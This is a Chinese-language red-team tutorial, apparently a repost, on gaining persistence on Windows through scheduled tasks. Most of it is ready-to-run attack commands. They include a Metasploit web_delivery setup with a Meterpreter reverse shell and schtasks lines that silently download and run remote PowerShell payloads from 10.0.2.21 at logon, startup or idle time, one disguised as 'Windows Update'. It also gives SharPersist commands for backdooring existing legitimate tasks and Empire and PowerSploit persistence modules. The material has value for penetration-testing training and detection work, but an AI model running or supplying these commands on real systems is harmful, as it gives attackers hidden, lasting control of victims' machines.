Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。普通情况下,通过计划任务实现持续性攻击不需要用到管理员的权限,但是如果你希望能获得更加灵活的操作,例如指定用户登录时或者系统空闲时执行某个任务,还是会需要用到管理员的权限。
通过计划任务完成的持续性攻击既可以手动实现,也可以自动实现。Payload既可以从磁盘上执行,也可以从远程位置下载执行,这些Payload可以是可执行文件、PowerShell脚本或者scriptlets形式。
这种方法已经由来已久,但是却仍然被黑客或者红队所广泛使用,而且现在已经有很多开源工具中也都使用了这个方法。
Metasploit中的“web_delivery”模块可用于管理和生成各种格式的Payload。
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
set target 5
exploit
在命令提示行中使用“schtasks”命令可以创建一个计划任务。
例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru Syste
当系统用户再次登录时,系统将下载执行Payload并建立Meterpreter会话。
也可以指定Payload在系统启动期间或系统空闲时执行。
#(X64) - On System Start
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onstart /ru System
#(X64) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onidle /i 30
#(X86) - On User Login
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onlogon /ru System
#(X86) - On System Start
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onstart /ru System
#(X86) - On User Idle (30mins)
schtasks /create /tn PentestLab /tr
"c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX
((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"
/sc onidle /i 30
另外我们也可以指定Payload在特定的日期和时间来执行,而且也可以实现Payload的自动删除。
schtasks /CREATE /TN "Windows Update" /TR
"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle
hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object
net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/SC
minute /MO 1 /ED 04/11/2019 /ET 06:53 /Z /IT /RU %USERNAME%
如果一个事件(event)开启了事件日志(event logging),那么就可以通过这个事件来触发一个任务(task),b33f在他的网站上展示了这种技术。在Windows中的事件(event)命令行可以查询事件(event)的ID。
我们可以创建一个关联特定事件的计划任务(下载执行某个payload)。
“Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v
当目标系统的用户管理员注销时,将创建事件ID,并在下次登录时执行payload。
我们也可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定的时间和日期执行。
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -AtLogOn -User "pentestlab"
$S = New-ScheduledTaskSettingsSet
$P = New-ScheduledTaskPrincipal "Pentestlab"
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask Pentestlab -InputObjec $D
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\pentestlab.exe"
$T = New-ScheduledTaskTrigger -Daily -At 9am
$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
$S = New-ScheduledTaskSettingsSet
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
Register-ScheduledTask PentestLaboratories -InputObject $D
SharPersist
https://github.com/fireeye/SharPersist
Brett Hawkins通过计划任务在工具SharPersist中实现多种持续性攻击的方法。如果用户具有管理员级别的权限,就可以使用以下命令来创建一个新的计划任务,该任务将会在系统登录时执行。
SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m add -o logon
在下一次登录系统时,将执行payload并打开MeterMeter会话。
SharPersist -t schtask -m list -n "PentestLab"
或者只使用“list”选项而不指定名称将枚举系统上所有现有的计划任务。
SharPersist -t schtask -m list
与Metasploit框架功能类似,SharPersist中也具有检查目标是否易受攻击的功能,SharPersist提供了一个运行检查,这个功能可用于通过检查名称和提供的参数来验证计划任务。
SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m check
SharPersist还可以枚举登录期间将执行的所有计划任务。此命令可在主机的环境调查(situational awareness)期间使用,并确定是否可以修改现有任务而不是新建任务来执行Payload。
SharPersist -t schtaskbackdoor -m list -o logon
schtaskbackdoor功能和check结合使用,可以识别特定的调度任务是否已存在后门。
SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "PentestLab" -m check
“Add”参数用来隐藏一个现有的计划任务,该任务将执行恶意命令,而不是执行合法的操作。
SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c
C:\tmp\pentestlab.exe" -n "ReconcileLanguageResources" -m add
Empire
Empire中包含两个可以用来实现计划任务的模块(区别在于使用时权限不同),下面给出的命令可以通过PowerShell的userland模块在每天的3:22am执行一个payload。这个payload在注册表中的的任务名称为“WindowsUpdate”,这里要和正常的任务区分开。
usemodule persistence/userland/schtasks
set Listener http
set TaskName WindowsUpdate
set DailyTime 03:22
execute
PowerShell的elevated模块提供了一个用户登录时执行计划任务的选项。注册表中将这两个模块以Base64编码的格式存储在不同的表项中。
usemodule persistence/elevated/schtasks*
set Listener http
PowerSploit
PowerSploit的持续性攻击模块支持一些可以向脚本或脚本块添加持续性攻击的功能。在使用这个模块时,需要配置Elevated和user选项。
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Hourly
$UserOptions = New-UserPersistenceOption -ScheduledTask -Hourly
Add-Persistence -FilePath C:\temp\empire.exe -ElevatedPersistenceOption
$ElevatedOptions -UserPersistenceOption $UserOptions
转自:ms08067